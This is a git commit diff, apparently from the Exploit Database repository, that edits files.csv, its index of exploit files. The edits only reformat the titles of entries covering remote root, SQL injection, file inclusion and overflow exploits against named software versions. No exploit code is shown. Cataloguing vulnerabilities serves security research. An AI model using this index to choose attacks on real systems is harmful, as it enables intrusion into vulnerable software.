DB: 2015-06-24

12 new exploits
Offensive Security 2015-06-24 05:02:37 +00:00
parent ec2076bbfe
commit 15dae7c288
39 changed files with 2808 additions and 2288 deletions

142
files.csv

@ -72,11 +72,11 @@ id,file,description,date,author,platform,type,port
71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0
72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0
73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service Exploit",2003-08-01,l0bstah,windows,dos,0
74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21
74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 - off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21
75,platforms/linux/local/75.c,"man-db 2.4.1 open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0
76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135
77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit (advanced version)",2003-08-11,Xpl017Elz,linux,remote,21
78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21
79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
@ -344,7 +344,7 @@ id,file,description,date,author,platform,type,port
368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0
370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0
371,platforms/linux/dos/371.c,"Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)",2004-08-02,N/A,linux,dos,0
371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (c Version)",2004-08-02,N/A,linux,dos,0
372,platforms/linux/remote/372.c,"OpenFTPD <= 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21
374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0
@ -503,7 +503,7 @@ id,file,description,date,author,platform,type,port
651,platforms/windows/dos/651.c,"Halo <= 1.05 Broadcast Client Crash Exploit",2004-11-22,"Luigi Auriemma",windows,dos,0
652,platforms/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow Exploit",2004-11-23,"Serkan Akpolat",linux,remote,8080
653,platforms/windows/dos/653.c,"Soldier of Fortune II <= 1.3 Server/Client Denial of Service Exploit",2004-11-23,"Luigi Auriemma",windows,dos,0
654,platforms/windows/remote/654.c,"Winamp <= 5.06 IN_CDDA.dll Remote Buffer Overflow Exploit",2004-11-24,k-otik,windows,remote,0
654,platforms/windows/remote/654.c,"Winamp <= 5.06 - IN_CDDA.dll Remote Buffer Overflow Exploit",2004-11-24,k-otik,windows,remote,0
655,platforms/windows/dos/655.c,"Star Wars Battlefront <= 1.1 Fake Players Denial of Service Exploit",2004-11-24,"Luigi Auriemma",windows,dos,0
657,platforms/linux/local/657.c,"atari800 - Local Root Exploit",2004-11-25,pi3,linux,local,0
658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143
@ -577,7 +577,7 @@ id,file,description,date,author,platform,type,port
745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000
746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000
749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0
750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x Browser Overflow (c version)",2005-01-11,class101,windows,remote,6101
750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow (c Version)",2005-01-11,class101,windows,remote,6101
753,platforms/windows/remote/753.html,"Microsoft Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0
754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 SQL Injection Exploit",2005-01-13,RusH,php,webapps,0
755,platforms/windows/dos/755.c,"Breed <= patch #1 - zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649
@ -663,7 +663,7 @@ id,file,description,date,author,platform,type,port
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0
840,platforms/cgi/webapps/840.c,"AWStats 5.7 - 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0
841,platforms/windows/dos/841.c,"Soldier of Fortune 2 <= 1.03 - _cl_guid_ - Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0
842,platforms/linux/dos/842.c,"wu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit",2005-02-25,str0ke,linux,dos,0
842,platforms/linux/dos/842.c,"wu-ftpd <= 2.6.2 - File Globbing Denial of Service Exploit",2005-02-25,str0ke,linux,dos,0
843,platforms/windows/dos/843.c,"Knet <= 1.04c Buffer Overflow Denial of Service Exploit",2005-02-25,CorryL,windows,dos,0
844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure Exploit (asm)",2005-02-26,illwill,windows,local,0
845,platforms/windows/remote/845.c,"BadBlue 2.5 Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80
@ -879,7 +879,7 @@ id,file,description,date,author,platform,type,port
1069,platforms/php/webapps/1069.php,"UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit",2005-06-25,mh_p0rtal,php,webapps,0
1070,platforms/asp/webapps/1070.pl,"ASPNuke <= 0.80 (article.asp) SQL Injection Exploit",2005-06-27,mh_p0rtal,asp,webapps,0
1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0
1072,platforms/multiple/dos/1072.cpp,"Stream / Raped Denial of Service Attack (win version)",2005-06-27,"Marco Del Percio",multiple,dos,0
1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows Version)",2005-06-27,"Marco Del Percio",multiple,dos,0
1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103
@ -1585,7 +1585,7 @@ id,file,description,date,author,platform,type,port
1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0
1876,platforms/php/webapps/1876.pl,"SCart 2.0 (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0
1877,platforms/php/webapps/1877.php,"Claroline <= 1.7.6 (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0
1878,platforms/php/webapps/1878.txt,"Particle Wiki <= 1.0.2 (version) Remote SQL Injection Vulnerability",2006-06-05,FarhadKey,php,webapps,0
1878,platforms/php/webapps/1878.txt,"Particle Wiki <= 1.0.2 - Remote SQL Injection Vulnerability",2006-06-05,FarhadKey,php,webapps,0
1879,platforms/php/webapps/1879.txt,"dotWidget CMS <= 1.0.6 (file_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0
1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0
1881,platforms/php/webapps/1881.txt,"DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0
@ -1600,7 +1600,7 @@ id,file,description,date,author,platform,type,port
1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities",2006-06-08,"Federico Fazzi",php,webapps,0
1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability",2006-06-08,Kacper,php,webapps,0
1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0
1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 (ASP Version) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 - (ASP Version) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0
1895,platforms/php/webapps/1895.txt,"empris <= r20020923 (phormationdir) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0
1896,platforms/php/webapps/1896.txt,"aePartner <= 0.8.3 (dir[data]) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0
@ -1642,7 +1642,7 @@ id,file,description,date,author,platform,type,port
1932,platforms/php/webapps/1932.php,"Ultimate PHP Board <= 1.96 GOLD Multiple Vulnerabilities Exploit",2006-06-20,"Michael Brooks",php,webapps,0
1933,platforms/php/webapps/1933.txt,"BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities",2006-06-20,Kw3[R]Ln,php,webapps,0
1934,platforms/php/webapps/1934.txt,"dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability",2006-06-20,h4ntu,php,webapps,0
1935,platforms/windows/dos/1935.cpp,"Winamp <= 5.21 (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0
1935,platforms/windows/dos/1935.cpp,"Winamp <= 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0
1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability",2006-06-20,Archit3ct,php,webapps,0
1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
@ -1819,7 +1819,7 @@ id,file,description,date,author,platform,type,port
2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability",2006-08-07,SHiKaA,php,webapps,0
2122,platforms/php/webapps/2122.txt,"ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability",2006-08-07,"Philipp Niedziela",php,webapps,0
2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability",2006-08-07,SirDarckCat,php,webapps,0
2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)",2006-08-07,ratboy,windows,dos,0
2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 - (Windows Version) Remote Denial of Service Exploit (PHP)",2006-08-07,ratboy,windows,dos,0
2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component <= 1.0.2 - Remote Include Vulnerability",2006-08-07,jank0,php,webapps,0
2127,platforms/php/webapps/2127.txt,"Modernbill <= 1.6 (config.php) Remote File Include Vulnerability",2006-08-07,Solpot,php,webapps,0
2128,platforms/php/webapps/2128.txt,"SAPID CMS <= 1.2.3.05 (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0
@ -1841,10 +1841,10 @@ id,file,description,date,author,platform,type,port
2144,platforms/linux/local/2144.sh,"liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0
2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0
2146,platforms/php/webapps/2146.txt,"docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0
2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)",2006-08-08,Elo,windows,dos,0
2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 - (Windows version) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0
2148,platforms/php/webapps/2148.txt,"phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability",2006-08-08,Drago84,php,webapps,0
2149,platforms/php/webapps/2149.txt,"Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability",2006-08-08,Drago84,php,webapps,0
2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0
2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0
2151,platforms/php/webapps/2151.txt,"Cwfm <= 0.9.1 (Language) Remote File Inclusion Vulnerability",2006-08-08,"Philipp Niedziela",php,webapps,0
2152,platforms/php/webapps/2152.php,"PHP <= 4.4.3 / 5.1.4 (objIndex) Local Buffer Overflow Exploit PoC",2006-08-08,Heintz,php,webapps,0
2153,platforms/php/webapps/2153.txt,"Boite de News <= 4.0.1 (index.php) Remote File Inclusion Vulnerability",2006-08-09,"the master",php,webapps,0
@ -2396,7 +2396,7 @@ id,file,description,date,author,platform,type,port
2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0
2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0
2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
2710,platforms/php/webapps/2710.txt,"Ariadne <= 2.4 store_config[code] Remote File Include Vulnerabilities",2006-11-04,"Mehmet Ince",php,webapps,0
2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0
@ -3421,7 +3421,7 @@ id,file,description,date,author,platform,type,port
3765,platforms/php/webapps/3765.txt,"opensurveypilot <= 1.2.1 - Remote File Inclusion Vulnerability",2007-04-18,"Alkomandoz Hacker",php,webapps,0
3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion Vuln",2007-04-19,bd0rk,php,webapps,0
3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 (error.asp id) Remote SQL Injection Vulnerability",2007-04-19,CyberGhost,asp,webapps,0
3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 (WMV File) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0
3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 - (WMV File) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0
3769,platforms/linux/dos/3769.c,"eXtremail <= 2.1.1 DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0
3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 (PDF) Remote Denial of Service Exploit",2007-04-20,n00b,windows,dos,0
3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion Vulnerabilities",2007-04-21,GoLd_M,php,webapps,0
@ -3655,7 +3655,7 @@ id,file,description,date,author,platform,type,port
4001,platforms/windows/local/4001.cpp,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit",2007-05-28,n00b,windows,local,0
4002,platforms/windows/local/4002.py,"UltraISO <= 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit (2)",2007-05-28,"Thomas Pollet",windows,local,0
4003,platforms/php/webapps/4003.sh,"Joomla Component Phil-a-Form <= 1.2.0.0 - SQL Injection Exploit",2007-05-28,CypherXero,php,webapps,0
4004,platforms/php/webapps/4004.php,"Inout Search Engine (all version) Remote Code Execution Exploit",2007-05-29,BlackHawk,php,webapps,0
4004,platforms/php/webapps/4004.php,"Inout Search Engine All Version - Remote Code Execution Exploit",2007-05-29,BlackHawk,php,webapps,0
4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 (live_status.lib.php ROOT) RFI Vulnerability",2007-05-29,"ThE TiGeR",php,webapps,0
4006,platforms/php/webapps/4006.php,"Pheap 2.0 Admin Bypass / Remote Code Execution Exploit",2007-05-29,Silentz,php,webapps,0
4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 (tr) Remote SQL Injection Vulnerability",2007-05-30,BAHADIR,asp,webapps,0
@ -3894,7 +3894,7 @@ id,file,description,date,author,platform,type,port
4247,platforms/windows/remote/4247.c,"Borland Interbase <= 2007 SP1 Create-Request Remote Overflow Exploit",2007-07-30,BackBone,windows,remote,3050
4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 (mapId) Remote SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0
4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Exploit",2007-07-31,tenkei_ev,multiple,dos,0
4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 GetComponentVersion() Remote Overflow Exploit",2007-07-31,lhoang8500,windows,remote,0
4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow Exploit",2007-07-31,lhoang8500,windows,remote,0
4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit",2007-07-31,DeltahackingTEAM,windows,dos,0
4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - (.mpr replay) Buffer Overflow Exploit",2007-08-01,n00b,windows,local,0
4253,platforms/php/webapps/4253.pl,"paBugs <= 2.0 Beta 3 (main.php cid) Remote SQL Injection Exploit",2007-08-02,uimp,php,webapps,0
@ -4345,7 +4345,7 @@ id,file,description,date,author,platform,type,port
4700,platforms/windows/remote/4700.txt,"simple httpd <= 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0
4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0
4702,platforms/windows/local/4702.pl,"Windows Media Player 6.4 MP4 File Stack Overflow PoC",2007-12-08,"SYS 49152",windows,local,0
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 MP4 tags Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 tags Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0
4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure Vulnerability",2007-12-08,GoLd_M,php,webapps,0
4705,platforms/php/webapps/4705.txt,"Flat PHP Board <= 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0
4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability",2007-12-09,S.W.A.T.,php,webapps,0
@ -4464,7 +4464,7 @@ id,file,description,date,author,platform,type,port
4821,platforms/php/webapps/4821.txt,"IPTBB <= 0.5.4 (viewdir id) Remote SQL Injection Vulnerability",2007-12-31,MhZ91,php,webapps,0
4822,platforms/php/webapps/4822.txt,"MyPHP Forum <= 3.0 (Final) Multiple SQL Injection Vulnerabilities",2007-12-31,x0kster,php,webapps,0
4823,platforms/php/webapps/4823.pl,"Zenphoto 1.1.3 (rss.php albumnr) Remote SQL Injection Exploit",2007-12-31,Silentz,php,webapps,0
4824,platforms/asp/webapps/4824.py,"oneSCHOOL (all versions) admin/login.asp SQL Injection Exploit",2007-12-31,Guga360,asp,webapps,0
4824,platforms/asp/webapps/4824.py,"oneSCHOOL All Versions - admin/login.asp SQL Injection Exploit",2007-12-31,Guga360,asp,webapps,0
4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 API ActiveX Control BoF Exploit",2007-12-31,Elazar,windows,remote,0
4826,platforms/php/webapps/4826.pl,"WebPortal CMS <= 0.6.0 (index.php m) Remote SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0
4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade <= 2.1.3 - SQL Injection Vulnerability",2007-12-31,Houssamix,php,webapps,0
@ -7233,7 +7233,7 @@ id,file,description,date,author,platform,type,port
7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC",2009-01-07,Houssamix,windows,dos,0
7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - (.aup) Remote off by one Crash Exploit",2009-01-07,Stack,windows,dos,0
7695,platforms/windows/local/7695.pl,"VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit",2009-01-07,SkD,windows,local,0
7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin Heap Buffer Overflow PoC",2009-01-07,SkD,windows,dos,0
7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow PoC",2009-01-07,SkD,windows,dos,0
7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection Vulnerability",2009-01-07,IRCRASH,php,webapps,0
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability",2009-01-07,IRCRASH,php,webapps,0
7699,platforms/php/webapps/7699.txt,"QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability",2009-01-07,Moudi,php,webapps,0
@ -7279,7 +7279,7 @@ id,file,description,date,author,platform,type,port
7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - (Download File) Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0
7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload Vulnerability",2009-01-12,ahmadbady,php,webapps,0
7741,platforms/asp/webapps/7741.txt,"dMx READY (25 Products) Remote Database Disclosure Vulnerability",2009-01-12,Cyber-Zone,asp,webapps,0
7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0
7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 - (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0
7743,platforms/php/webapps/7743.txt,"Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability",2009-01-12,ahmadbady,php,webapps,0
7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 - Remote Database Disclosure Vulnerability",2009-01-13,Moudi,asp,webapps,0
7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - (.asx) (Universal) Local Buffer Overflow Exploit",2009-01-13,"Encrypt3d.M!nd ",windows,local,0
@ -7675,7 +7675,7 @@ id,file,description,date,author,platform,type,port
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80
8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0
8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0
8158,platforms/windows/local/8158.pl,"Winamp <= 5.541 Skin Universal Buffer Overflow Exploit",2009-03-05,SkD,windows,local,0
8158,platforms/windows/local/8158.pl,"Winamp <= 5.541 - Skin Universal Buffer Overflow Exploit",2009-03-05,SkD,windows,local,0
8159,platforms/windows/local/8159.rb,"Media Commands .m3l File Local Buffer Overflow Exploit",2009-03-05,Stack,windows,local,0
8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module (dnaedit.dll) Code Execution Exploit",2009-03-05,Nine:Situations:Group,windows,remote,0
8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
@ -8233,7 +8233,7 @@ id,file,description,date,author,platform,type,port
8730,platforms/php/webapps/8730.txt,"VidShare Pro Arbitrary Shell Upload Vulnerability",2009-05-19,InjEctOr5,php,webapps,0
8731,platforms/php/webapps/8731.php,"Joomla com_gsticketsystem (catid) Blind SQL Injection Exploit",2009-05-19,InjEctOr5,php,webapps,0
8732,platforms/windows/remote/8732.py,"httpdx <= 0.5b FTP Server (CWD) Remote BoF Exploit (SEH)",2009-05-19,His0k4,windows,remote,21
8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() Remote BoF Exploit",2009-05-19,rgod,windows,remote,0
8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote BoF Exploit",2009-05-19,rgod,windows,remote,0
8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure Vulnerability",2009-05-19,Securitylab.ir,asp,webapps,0
8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability",2009-05-19,Mr.tro0oqy,php,webapps,0
8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery <= 1.4.22 - Remote Exploit",2009-05-19,girex,php,webapps,0
@ -8266,11 +8266,11 @@ id,file,description,date,author,platform,type,port
8764,platforms/php/webapps/8764.txt,"ZaoCMS (download.php) Remote File Disclosure Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)",2009-05-22,racle,windows,remote,0
8766,platforms/php/webapps/8766.txt,"Tutorial Share <= 3.5.0 Insecure Cookie Handling Vulnerability",2009-05-22,Evil-Cod3r,php,webapps,0
8767,platforms/windows/dos/8767.c,"Winamp 5.551 MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0
8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0
8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection Vulnerability",2009-05-22,Qabandi,php,webapps,0
8770,platforms/windows/local/8770.py,"Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0
8770,platforms/windows/local/8770.py,"Winamp <= 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0
8771,platforms/php/webapps/8771.htm,"ZaoCMS (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0
8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0
8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 - (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0
8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability",2009-05-22,Qabandi,php,webapps,0
8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0
8775,platforms/php/webapps/8775.txt,"Mole Group Restaurant Directory Script 3.0 Change Admin Pass Vuln",2009-05-22,G4N0K,php,webapps,0
@ -8281,7 +8281,7 @@ id,file,description,date,author,platform,type,port
